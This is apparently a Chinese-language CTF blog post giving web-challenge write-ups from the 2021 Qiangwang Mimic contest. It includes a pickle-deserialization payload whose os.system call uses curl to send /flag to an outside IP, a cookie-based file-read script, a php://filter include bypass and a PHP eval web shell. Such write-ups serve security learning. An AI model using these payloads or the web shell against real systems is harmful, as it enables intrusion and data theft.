<!DOCTYPE html>
<html lang=en>
<head>
    <!-- so meta -->
    <meta charset="utf-8">
    <meta http-equiv="X-UA-Compatible" content="IE=edge">
    <meta name="HandheldFriendly" content="True">
    <meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=5" />
    <meta name="description" content="兄弟姐妹们太棒了，我愿称你们为最强~恭喜 xp xd ~  在这里记录一下 Web 题的题解叭。 zerocalc这题是签到 js，本来以为挺复杂的，就让队友去看了，结果队友也想偏了，第二天我看的时候随便试了一下 readFile(‘&#x2F;flag’)，然后就挺意外的。。。  ezPickle题目给了源码： 12345678910111213141516171819202122232425262728">
<meta property="og:type" content="article">
<meta property="og:title" content="2021_强网拟态_WP">
<meta property="og:url" content="http://example.com/2021/10/25/2021-%E5%BC%BA%E7%BD%91%E6%8B%9F%E6%80%81-WP/index.html">
<meta property="og:site_name" content="Du1L0v3">
<meta property="og:description" content="兄弟姐妹们太棒了，我愿称你们为最强~恭喜 xp xd ~  在这里记录一下 Web 题的题解叭。 zerocalc这题是签到 js，本来以为挺复杂的，就让队友去看了，结果队友也想偏了，第二天我看的时候随便试了一下 readFile(‘&#x2F;flag’)，然后就挺意外的。。。  ezPickle题目给了源码： 12345678910111213141516171819202122232425262728">
<meta property="og:locale" content="en_US">
<meta property="og:image" content="https://api.lemonprefect.cn/image/hdslb/archive/4546426bb942e3d0113cd98cc978642c/1635766850629942/0171545beecf184fd9d77891a924b21271eb8ee9.png">
<meta property="og:image" content="https://api.lemonprefect.cn/image/hdslb/archive/4546426bb942e3d0113cd98cc978642c/1635766842225586/82ec64eff7a0509eca2461f5b422ae9b0c8a513b.png">
<meta property="og:image" content="https://api.lemonprefect.cn/image/hdslb/archive/4546426bb942e3d0113cd98cc978642c/1635766831407673/33ad2f2c5222cf5bceb7c9040469e2488db7cb90.png">
<meta property="og:image" content="https://api.lemonprefect.cn/image/hdslb/archive/4546426bb942e3d0113cd98cc978642c/1635766786086197/edb92a0be23c0cf86f2bffa769400c932b0fc6f3.png">
<meta property="og:image" content="https://api.lemonprefect.cn/image/hdslb/archive/4546426bb942e3d0113cd98cc978642c/1635766776515466/de5bfef3f38b2e08abb9ce857966da3dfd9acf3e.png">
<meta property="og:image" content="https://api.lemonprefect.cn/image/hdslb/archive/4546426bb942e3d0113cd98cc978642c/1635766764681935/2c0bb5c61c232b8a7ec9e958280e6109465b8d93.png">
<meta property="article:published_time" content="2021-10-25T02:59:33.000Z">
<meta property="article:modified_time" content="2021-11-01T11:40:57.423Z">
<meta property="article:author" content="Du1L0v3">
<meta property="article:tag" content="WriteUp">
<meta name="twitter:card" content="summary">
<meta name="twitter:image" content="https://api.lemonprefect.cn/image/hdslb/archive/4546426bb942e3d0113cd98cc978642c/1635766850629942/0171545beecf184fd9d77891a924b21271eb8ee9.png">
    
    
      
        
          <link rel="shortcut icon" href="/images/favicon.ico">
        
      
      
        
          <link rel="icon" type="image/png" href="/images/favicon-192x192.png" sizes="192x192">
        
      
      
        
          <link rel="apple-touch-icon" sizes="180x180" href="/images/apple-touch-icon.png">
        
      
    
    <!-- title -->
    <title>2021_强网拟态_WP</title>
    <!-- styles -->
    
<link rel="stylesheet" href="/css/style.css">

    <!-- persian styles -->
    
    <!-- rss -->
    
    
	<!-- mathjax -->
	
<!--
<link rel="stylesheet" href="//cdn.bootcss.com/highlight.js/9.2.0/styles/github.min.css">
<script src="//cdn.bootcss.com/highlight.js/9.2.0/highlight.min.js"></script>
<script>hljs.initHighlightingOnLoad();</script>
-->
<meta name="generator" content="Hexo 5.4.0"></head>

<body class="max-width mx-auto px3 ltr">
    
      <div id="header-post">
  <a id="menu-icon" href="#" aria-label="Menu"><i class="fas fa-bars fa-lg"></i></a>
  <a id="menu-icon-tablet" href="#" aria-label="Menu"><i class="fas fa-bars fa-lg"></i></a>
  <a id="top-icon-tablet" href="#" "Top" onclick="$('html, body').animate({ scrollTop: 0 }, 'fast');" style="display:none;"><i class="fas fa-chevron-up fa-lg"></i></a>
  <span id="menu">
    <span id="nav">
      <ul>
         
          <li><a href="/">Home</a></li>
         
          <li><a href="/archives/">Articles</a></li>
         
          <li><a href="/categories/">Categories</a></li>
         
          <li><a href="/search/">Search</a></li>
         
          <li><a href="/links/">Links</a></li>
         
          <li><a href="/about/">About</a></li>
         
          <li><a target="_blank" rel="noopener" href="https://github.com/duitutu">Projects</a></li>
        
      </ul>
    </span>
    <br/>
    <span id="actions">
      <ul>
        
        <li><a class="icon" aria-label="Previous post " href="/2021/10/27/%E5%8D%81%E6%9C%88/"><i class="fas fa-chevron-left" aria-hidden="true" onmouseover="$('#i-prev').toggle();" onmouseout="$('#i-prev').toggle();"></i></a></li>
        
        
        <li><a class="icon" aria-label="Next post " href="/2021/10/20/2021-Jomadas-WEB3-WP/"><i class="fas fa-chevron-right" aria-hidden="true" onmouseover="$('#i-next').toggle();" onmouseout="$('#i-next').toggle();"></i></a></li>
        
        <li><a class="icon" aria-label="Back to top " href="#" onclick="$('html, body').animate({ scrollTop: 0 }, 'fast');"><i class="fas fa-chevron-up" aria-hidden="true" onmouseover="$('#i-top').toggle();" onmouseout="$('#i-top').toggle();"></i></a></li>
        <li><a class="icon" aria-label="Share post " href="#"><i class="fas fa-share-alt" aria-hidden="true" onmouseover="$('#i-share').toggle();" onmouseout="$('#i-share').toggle();" onclick="$('#share').toggle();return false;"></i></a></li>
      </ul>
      <span id="i-prev" class="info" style="display:none;">Previous post</span>
      <span id="i-next" class="info" style="display:none;">Next post</span>
      <span id="i-top" class="info" style="display:none;">Back to top</span>
      <span id="i-share" class="info" style="display:none;">Share post</span>
    </span>
    <br/>
    <div id="share" style="display: none">
      <ul>
  <li><a class="icon" target="_blank" rel="noopener" href="http://www.facebook.com/sharer.php?u=http://example.com/2021/10/25/2021-%E5%BC%BA%E7%BD%91%E6%8B%9F%E6%80%81-WP/"><i class="fab fa-facebook " aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="https://twitter.com/share?url=http://example.com/2021/10/25/2021-%E5%BC%BA%E7%BD%91%E6%8B%9F%E6%80%81-WP/&text=2021_强网拟态_WP"><i class="fab fa-twitter " aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="http://www.linkedin.com/shareArticle?url=http://example.com/2021/10/25/2021-%E5%BC%BA%E7%BD%91%E6%8B%9F%E6%80%81-WP/&title=2021_强网拟态_WP"><i class="fab fa-linkedin " aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="https://pinterest.com/pin/create/bookmarklet/?url=http://example.com/2021/10/25/2021-%E5%BC%BA%E7%BD%91%E6%8B%9F%E6%80%81-WP/&is_video=false&description=2021_强网拟态_WP"><i class="fab fa-pinterest " aria-hidden="true"></i></a></li>
  <li><a class="icon" href="mailto:?subject=2021_强网拟态_WP&body=Check out this article: http://example.com/2021/10/25/2021-%E5%BC%BA%E7%BD%91%E6%8B%9F%E6%80%81-WP/"><i class="fas fa-envelope " aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="https://getpocket.com/save?url=http://example.com/2021/10/25/2021-%E5%BC%BA%E7%BD%91%E6%8B%9F%E6%80%81-WP/&title=2021_强网拟态_WP"><i class="fab fa-get-pocket " aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="http://reddit.com/submit?url=http://example.com/2021/10/25/2021-%E5%BC%BA%E7%BD%91%E6%8B%9F%E6%80%81-WP/&title=2021_强网拟态_WP"><i class="fab fa-reddit " aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="http://www.stumbleupon.com/submit?url=http://example.com/2021/10/25/2021-%E5%BC%BA%E7%BD%91%E6%8B%9F%E6%80%81-WP/&title=2021_强网拟态_WP"><i class="fab fa-stumbleupon " aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="http://digg.com/submit?url=http://example.com/2021/10/25/2021-%E5%BC%BA%E7%BD%91%E6%8B%9F%E6%80%81-WP/&title=2021_强网拟态_WP"><i class="fab fa-digg " aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="http://www.tumblr.com/share/link?url=http://example.com/2021/10/25/2021-%E5%BC%BA%E7%BD%91%E6%8B%9F%E6%80%81-WP/&name=2021_强网拟态_WP&description="><i class="fab fa-tumblr " aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="https://news.ycombinator.com/submitlink?u=http://example.com/2021/10/25/2021-%E5%BC%BA%E7%BD%91%E6%8B%9F%E6%80%81-WP/&t=2021_强网拟态_WP"><i class="fab fa-hacker-news " aria-hidden="true"></i></a></li>
</ul>

    </div>
    <div id="toc">
      <ol class="toc"><li class="toc-item toc-level-2"><a class="toc-link" href="#zerocalc"><span class="toc-number">1.</span> <span class="toc-text">zerocalc</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#ezPickle"><span class="toc-number">2.</span> <span class="toc-text">ezPickle</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#Jack-Shiro"><span class="toc-number">3.</span> <span class="toc-text">Jack-Shiro</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#new-hospital"><span class="toc-number">4.</span> <span class="toc-text">new_hospital</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#EasyFilter"><span class="toc-number">5.</span> <span class="toc-text">EasyFilter</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#Give-me-your-0day"><span class="toc-number">6.</span> <span class="toc-text">Give_me_your_0day</span></a></li></ol>
    </div>
  </span>
</div>

    
    <div class="content index py4">
        
        <article class="post" itemscope itemtype="http://schema.org/BlogPosting">
  <header>
    
    <h1 class="posttitle" itemprop="name headline">
        2021_强网拟态_WP
    </h1>



    <div class="meta">
      <span class="author" itemprop="author" itemscope itemtype="http://schema.org/Person">
        <span itemprop="name">Du1L0v3</span>
      </span>
      
    <div class="postdate">
      
        <time datetime="2021-10-25T02:59:33.000Z" itemprop="datePublished">2021-10-25</time>
        
        (Updated: <time datetime="2021-11-01T11:40:57.423Z" itemprop="dateModified">2021-11-01</time>)
        
      
    </div>


      
    <div class="article-category">
        <i class="fas fa-archive"></i>
        <a class="category-link" href="/categories/WriteUp/">WriteUp</a>
    </div>


      
    <div class="article-tag">
        <i class="fas fa-tag"></i>
        <a class="tag-link-link" href="/tags/WriteUp/" rel="tag">WriteUp</a>
    </div>


    </div>
  </header>
  

  <div class="content" itemprop="articleBody">
    <p>兄弟姐妹们太棒了，我愿称你们为最强~恭喜 xp xd ~</p>
<p><img src="https://api.lemonprefect.cn/image/hdslb/archive/4546426bb942e3d0113cd98cc978642c/1635766850629942/0171545beecf184fd9d77891a924b21271eb8ee9.png"></p>
<p>在这里记录一下 Web 题的题解叭。</p>
<h2 id="zerocalc"><a href="#zerocalc" class="headerlink" title="zerocalc"></a>zerocalc</h2><p>这题是签到 js，本来以为挺复杂的，就让队友去看了，结果队友也想偏了，第二天我看的时候随便试了一下 readFile(‘/flag’)，然后就挺意外的。。。</p>
<p><img src="https://api.lemonprefect.cn/image/hdslb/archive/4546426bb942e3d0113cd98cc978642c/1635766842225586/82ec64eff7a0509eca2461f5b422ae9b0c8a513b.png"></p>
<h2 id="ezPickle"><a href="#ezPickle" class="headerlink" title="ezPickle"></a>ezPickle</h2><p>题目给了源码：</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">from</span> flask <span class="keyword">import</span> Flask, request, session, render_template_string, url_for,redirect</span><br><span class="line"><span class="keyword">import</span> pickle</span><br><span class="line"><span class="keyword">import</span> io</span><br><span class="line"><span class="keyword">import</span> sys</span><br><span class="line"><span class="keyword">import</span> base64</span><br><span class="line"><span class="keyword">import</span> random</span><br><span class="line"><span class="keyword">import</span> subprocess</span><br><span class="line"><span class="keyword">from</span> config <span class="keyword">import</span> notadmin</span><br><span class="line"></span><br><span class="line">app = Flask(__name__)</span><br><span class="line"></span><br><span class="line"><span class="class"><span class="keyword">class</span> <span class="title">RestrictedUnpickler</span>(<span class="params">pickle.Unpickler</span>):</span></span><br><span class="line">    <span class="function"><span class="keyword">def</span> <span class="title">find_class</span>(<span class="params">self, module, name</span>):</span></span><br><span class="line">        <span class="keyword">if</span> module <span class="keyword">in</span> [<span class="string">&#x27;config&#x27;</span>] <span class="keyword">and</span> <span class="string">&quot;__&quot;</span> <span class="keyword">not</span> <span class="keyword">in</span> name:</span><br><span class="line">            <span class="keyword">return</span> <span class="built_in">getattr</span>(sys.modules[module], name)</span><br><span class="line">        <span class="keyword">raise</span> pickle.UnpicklingError(<span class="string">&quot;&#x27;%s.%s&#x27; not allowed&quot;</span> % (module, name))</span><br><span class="line"></span><br><span class="line"></span><br><span class="line"><span class="function"><span class="keyword">def</span> <span class="title">restricted_loads</span>(<span class="params">s</span>):</span></span><br><span class="line">    <span class="string">&quot;&quot;&quot;Helper function analogous to pickle.loads().&quot;&quot;&quot;</span></span><br><span class="line">    <span class="keyword">return</span> RestrictedUnpickler(io.BytesIO(s)).load()</span><br><span class="line"></span><br><span class="line"><span class="meta">@app.route(<span class="params"><span class="string">&#x27;/&#x27;</span></span>)</span></span><br><span class="line"><span class="function"><span class="keyword">def</span> <span class="title">index</span>():</span></span><br><span class="line">    info = request.args.get(<span class="string">&#x27;name&#x27;</span>, <span class="string">&#x27;&#x27;</span>)</span><br><span class="line">    <span class="keyword">if</span> info <span class="keyword">is</span> <span class="keyword">not</span> <span class="string">&#x27;&#x27;</span>:</span><br><span class="line">        x = base64.b64decode(info)</span><br><span class="line">        User = restricted_loads(x)</span><br><span class="line">    <span class="keyword">return</span> render_template_string(<span class="string">&#x27;Hello&#x27;</span>)</span><br><span class="line"></span><br><span class="line"></span><br><span class="line"><span class="keyword">if</span> __name__ == <span class="string">&#x27;__main__&#x27;</span>:</span><br><span class="line">    app.run(host=<span class="string">&#x27;0.0.0.0&#x27;</span>, debug=<span class="literal">True</span>, port=<span class="number">5000</span>)</span><br></pre></td></tr></table></figure>

<p>pickle 反序列化，不过给限定了 module in [‘config’] 和 ‘__’，然后看看 config.py</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br></pre></td><td class="code"><pre><span class="line">notadmin=&#123;<span class="string">&quot;admin&quot;</span>:<span class="string">&quot;no&quot;</span>&#125;</span><br><span class="line"></span><br><span class="line"><span class="function"><span class="keyword">def</span> <span class="title">backdoor</span>(<span class="params">cmd</span>):</span></span><br><span class="line">    <span class="keyword">if</span> notadmin[<span class="string">&quot;admin&quot;</span>]==<span class="string">&quot;yes&quot;</span>:</span><br><span class="line">        s=<span class="string">&#x27;&#x27;</span>.join(cmd    )</span><br><span class="line">        <span class="built_in">eval</span>(s)</span><br></pre></td></tr></table></figure>

<p>可以尝试利用 c &amp; s 操作码进行全局变量覆盖，将 notadmin 中的 admin 修改为 yes 执行 eval</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br></pre></td><td class="code"><pre><span class="line">data = <span class="string">b&quot;&quot;&quot;cconfig</span></span><br><span class="line"><span class="string">notadmin</span></span><br><span class="line"><span class="string">S&quot;admin&quot;</span></span><br><span class="line"><span class="string">S&quot;yes&quot;</span></span><br><span class="line"><span class="string">s0</span></span><br><span class="line"><span class="string">&quot;&quot;&quot;</span></span><br></pre></td></tr></table></figure>

<p>然后直接用 curl 把 flag 带出来</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment"># 还是🍋骚</span></span><br><span class="line"><span class="keyword">import</span> base64</span><br><span class="line"><span class="keyword">import</span> httpx <span class="keyword">as</span> requests</span><br><span class="line">session = requests.Client(base_url=<span class="string">&quot;http://124.71.183.254:32770/&quot;</span>, timeout=<span class="number">2</span>)</span><br><span class="line">data = <span class="string">b&quot;&quot;&quot;cconfig</span></span><br><span class="line"><span class="string">notadmin</span></span><br><span class="line"><span class="string">S&quot;admin&quot;</span></span><br><span class="line"><span class="string">S&quot;yes&quot;</span></span><br><span class="line"><span class="string">s0(S&quot;__import__(&#x27;os&#x27;).system(&#x27;curl http://106.15.90.116:11451/?fuxk-$(cat /flag | base64)&#x27;)&quot;</span></span><br><span class="line"><span class="string">iconfig</span></span><br><span class="line"><span class="string">backdoor</span></span><br><span class="line"><span class="string">.</span></span><br><span class="line"><span class="string">&quot;&quot;&quot;</span></span><br><span class="line">session.get(<span class="string">&quot;/&quot;</span>, params=&#123;</span><br><span class="line"><span class="string">&quot;name&quot;</span>: base64.b64encode(data).decode()</span><br><span class="line">&#125;)</span><br></pre></td></tr></table></figure>

<p><img src="https://api.lemonprefect.cn/image/hdslb/archive/4546426bb942e3d0113cd98cc978642c/1635766831407673/33ad2f2c5222cf5bceb7c9040469e2488db7cb90.png"></p>
<p>这里利用到了 i 操作码</p>
<blockquote>
<p>相当于c和o的组合，先获取一个全局函数，然后寻找栈中的上一个MARK，并组合之间的数据为元组，以该元组为参数执行全局函数（或实例化一个对象）</p>
</blockquote>
<h2 id="Jack-Shiro"><a href="#Jack-Shiro" class="headerlink" title="Jack-Shiro"></a>Jack-Shiro</h2><p>原题。。。当时打过比赛的，就不写了，from 天翼杯2021 的 jackson</p>
<h2 id="new-hospital"><a href="#new-hospital" class="headerlink" title="new_hospital"></a>new_hospital</h2><p>这题本来早就出了，我傻逼了。。。</p>
<p>就是访问 feature.php?id=2 发现了 Cookie 中存在 API，base64 解码后发现是我们传入的值拼接 .js，同时发现 /old/feature.php 中存在任意文件读取，修改 Cookie 中的 API 即可任意文件读取，读取 flag.php 即可。</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">import</span> requests</span><br><span class="line"></span><br><span class="line">cookie = &#123;<span class="string">&quot;API&quot;</span>: <span class="string">&quot;L3Zhci93d3cvaHRtbC9mbGFnLnBocA%3D%3D&quot;</span>&#125;</span><br><span class="line">conn = requests.get(<span class="string">&quot;http://123.60.75.243:32766/old/feature.php&quot;</span>, cookies=cookie)</span><br><span class="line"></span><br><span class="line"><span class="built_in">print</span>(conn.text) </span><br></pre></td></tr></table></figure>

<h2 id="EasyFilter"><a href="#EasyFilter" class="headerlink" title="EasyFilter"></a>EasyFilter</h2><p>题目给出了源码</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">&lt;?php</span></span><br><span class="line">ini_set(<span class="string">&quot;open_basedir&quot;</span>,<span class="string">&quot;./&quot;</span>);</span><br><span class="line"><span class="keyword">if</span>(!<span class="keyword">isset</span>(<span class="variable">$_GET</span>[<span class="string">&#x27;action&#x27;</span>]))&#123;</span><br><span class="line">    highlight_file(<span class="keyword">__FILE__</span>);</span><br><span class="line">    <span class="keyword">die</span>();</span><br><span class="line">&#125;</span><br><span class="line"><span class="keyword">if</span>(<span class="variable">$_GET</span>[<span class="string">&#x27;action&#x27;</span>] == <span class="string">&#x27;w&#x27;</span>)&#123;</span><br><span class="line">    @mkdir(<span class="string">&quot;./files/&quot;</span>);</span><br><span class="line">    <span class="variable">$content</span> = <span class="variable">$_GET</span>[<span class="string">&#x27;c&#x27;</span>];</span><br><span class="line">    <span class="variable">$file</span> = bin2hex(random_bytes(<span class="number">5</span>));</span><br><span class="line">    file_put_contents(<span class="string">&quot;./files/&quot;</span>.<span class="variable">$file</span>,base64_encode(<span class="variable">$content</span>));</span><br><span class="line">    <span class="keyword">echo</span> <span class="string">&quot;./files/&quot;</span>.<span class="variable">$file</span>;</span><br><span class="line">&#125;<span class="keyword">elseif</span>(<span class="variable">$_GET</span>[<span class="string">&#x27;action&#x27;</span>] == <span class="string">&#x27;r&#x27;</span>)&#123;</span><br><span class="line">    <span class="variable">$r</span> = <span class="variable">$_GET</span>[<span class="string">&#x27;r&#x27;</span>];</span><br><span class="line">    <span class="variable">$file</span> = <span class="string">&quot;./files/&quot;</span>.<span class="variable">$r</span>;</span><br><span class="line">    <span class="keyword">include</span>(<span class="string">&quot;php://filter/resource=<span class="subst">$file</span>&quot;</span>);</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>

<p>谭总教的 fuzz 一下，第一天没 fuzz 出来，第二天随便试了一下出了，人傻了……</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">&lt;?php</span></span><br><span class="line">set_error_handler(<span class="function"><span class="keyword">function</span>(<span class="params"><span class="variable">$errno</span>, <span class="variable">$errstr</span>, <span class="variable">$errfile</span>, <span class="variable">$errline</span>, <span class="keyword">array</span> <span class="variable">$errcontext</span></span>) </span>&#123;</span><br><span class="line">    <span class="keyword">if</span> (<span class="number">0</span> === error_reporting()) &#123;</span><br><span class="line">        <span class="keyword">return</span> <span class="literal">false</span>;</span><br><span class="line">    &#125;</span><br><span class="line">    <span class="keyword">throw</span> <span class="keyword">new</span> <span class="built_in">ErrorException</span>(<span class="variable">$errstr</span>, <span class="number">0</span>, <span class="variable">$errno</span>, <span class="variable">$errfile</span>, <span class="variable">$errline</span>);</span><br><span class="line">&#125;);</span><br><span class="line"><span class="variable">$test</span> = <span class="string">&quot;&quot;</span>;</span><br><span class="line"><span class="keyword">for</span> (<span class="variable">$i</span> = <span class="number">0</span>; <span class="variable">$i</span> &lt; <span class="number">128</span>; <span class="variable">$i</span>++) &#123;</span><br><span class="line">    <span class="variable">$test</span> = chr(<span class="variable">$i</span>);</span><br><span class="line">    <span class="keyword">try</span> &#123;</span><br><span class="line">        <span class="keyword">include</span> <span class="string">&quot;php://filter/resource=123$&#123;test&#125;123/resource=a.txt&quot;</span>;</span><br><span class="line">    &#125; <span class="keyword">catch</span> (<span class="built_in">Throwable</span> <span class="variable">$e</span>) &#123;</span><br><span class="line">        <span class="keyword">echo</span> <span class="variable">$i</span>.<span class="string">&quot;         &quot;</span>.<span class="variable">$test</span>.<span class="string">&quot;     &quot;</span>.<span class="variable">$e</span>-&gt;getMessage().<span class="string">&quot;\n&quot;</span>;</span><br><span class="line">    &#125;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>

<p>发现了 @ 字符有点骚</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br></pre></td><td class="code"><pre><span class="line">60         &lt;     include(php:&#x2F;&#x2F;filter&#x2F;resource&#x3D;123&lt;123&#x2F;resource&#x3D;a.txt): failed to open stream: operation failed</span><br><span class="line">61         &#x3D;     include(php:&#x2F;&#x2F;filter&#x2F;resource&#x3D;123&#x3D;123&#x2F;resource&#x3D;a.txt): failed to open stream: operation failed</span><br><span class="line">62         &gt;     include(php:&#x2F;&#x2F;filter&#x2F;resource&#x3D;123&gt;123&#x2F;resource&#x3D;a.txt): failed to open stream: operation failed</span><br><span class="line">63         ?     include(php:&#x2F;&#x2F;filter&#x2F;resource&#x3D;123?123&#x2F;resource&#x3D;a.txt): failed to open stream: operation failed</span><br><span class="line">64         @     include(php:&#x2F;&#x2F;...@123&#x2F;resource&#x3D;a.txt): failed to open stream: operation failed</span><br><span class="line">65         A     include(php:&#x2F;&#x2F;filter&#x2F;resource&#x3D;123A123&#x2F;resource&#x3D;a.txt): failed to open stream: operation failed</span><br><span class="line">66         B     include(php:&#x2F;&#x2F;filter&#x2F;resource&#x3D;123B123&#x2F;resource&#x3D;a.txt): failed to open stream: operation failed</span><br><span class="line">67         C     include(php:&#x2F;&#x2F;filter&#x2F;resource&#x3D;123C123&#x2F;resource&#x3D;a.txt): failed to open stream: operation failed</span><br><span class="line">68         D     include(php:&#x2F;&#x2F;filter&#x2F;resource&#x3D;123D123&#x2F;resource&#x3D;a.txt): failed to open stream: operation failed</span><br></pre></td></tr></table></figure>

<p>可以尝试发送 <code>@/../../../index.php</code> 构造出 <code>php://filter/resource=./files/@/../../../index.php</code> 成功读取 index.php，所以可以尝试包含一下 files 下的文件，我们先传入一个包含了 <code>&lt;?php phpinfo();?&gt;</code> 的文件，然后尝试构造 <code>convert.base64-decode/resource@/../../../files/34699711a2</code> ，成功包含：</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">?action&#x3D;w&amp;c&#x3D;&lt;?php%20phpinfo();?&gt;</span><br></pre></td></tr></table></figure>

<p><img src="https://api.lemonprefect.cn/image/hdslb/archive/4546426bb942e3d0113cd98cc978642c/1635766786086197/edb92a0be23c0cf86f2bffa769400c932b0fc6f3.png"></p>
<p> 所以我们可以直接传入一个一句话木马：</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">?action&#x3D;w&amp;c&#x3D;&lt;?php%20eval($_POST[1]);?&gt;</span><br><span class="line">POST</span><br><span class="line">1&#x3D;?&gt;&lt;?&#x3D;&#96;cat &#x2F;flag&#96;;</span><br></pre></td></tr></table></figure>

<p><img src="https://api.lemonprefect.cn/image/hdslb/archive/4546426bb942e3d0113cd98cc978642c/1635766776515466/de5bfef3f38b2e08abb9ce857966da3dfd9acf3e.png"></p>
<h2 id="Give-me-your-0day"><a href="#Give-me-your-0day" class="headerlink" title="Give_me_your_0day"></a>Give_me_your_0day</h2><p>简单的 rogue_mysql，抓包改一下数据库类型，就把 flag 带出来就完事了……</p>
<p><img src="https://api.lemonprefect.cn/image/hdslb/archive/4546426bb942e3d0113cd98cc978642c/1635766764681935/2c0bb5c61c232b8a7ec9e958280e6109465b8d93.png"></p>
<p>PS：</p>
<p>🍋说看到我这个 。。。 的写法说受不住，舒服了</p>

  </div>
</article>



        
          <div id="footer-post-container">
  <div id="footer-post">

    <div id="nav-footer" style="display: none">
      <ul>
         
          <li><a href="/">Home</a></li>
         
          <li><a href="/archives/">Articles</a></li>
         
          <li><a href="/categories/">Categories</a></li>
         
          <li><a href="/search/">Search</a></li>
         
          <li><a href="/links/">Links</a></li>
         
          <li><a href="/about/">About</a></li>
         
          <li><a target="_blank" rel="noopener" href="https://github.com/duitutu">Projects</a></li>
        
      </ul>
    </div>

    <div id="toc-footer" style="display: none">
      <ol class="toc"><li class="toc-item toc-level-2"><a class="toc-link" href="#zerocalc"><span class="toc-number">1.</span> <span class="toc-text">zerocalc</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#ezPickle"><span class="toc-number">2.</span> <span class="toc-text">ezPickle</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#Jack-Shiro"><span class="toc-number">3.</span> <span class="toc-text">Jack-Shiro</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#new-hospital"><span class="toc-number">4.</span> <span class="toc-text">new_hospital</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#EasyFilter"><span class="toc-number">5.</span> <span class="toc-text">EasyFilter</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#Give-me-your-0day"><span class="toc-number">6.</span> <span class="toc-text">Give_me_your_0day</span></a></li></ol>
    </div>

    <div id="share-footer" style="display: none">
      <ul>
  <li><a class="icon" target="_blank" rel="noopener" href="http://www.facebook.com/sharer.php?u=http://example.com/2021/10/25/2021-%E5%BC%BA%E7%BD%91%E6%8B%9F%E6%80%81-WP/"><i class="fab fa-facebook fa-lg" aria-hidden="true"></i></a></li>
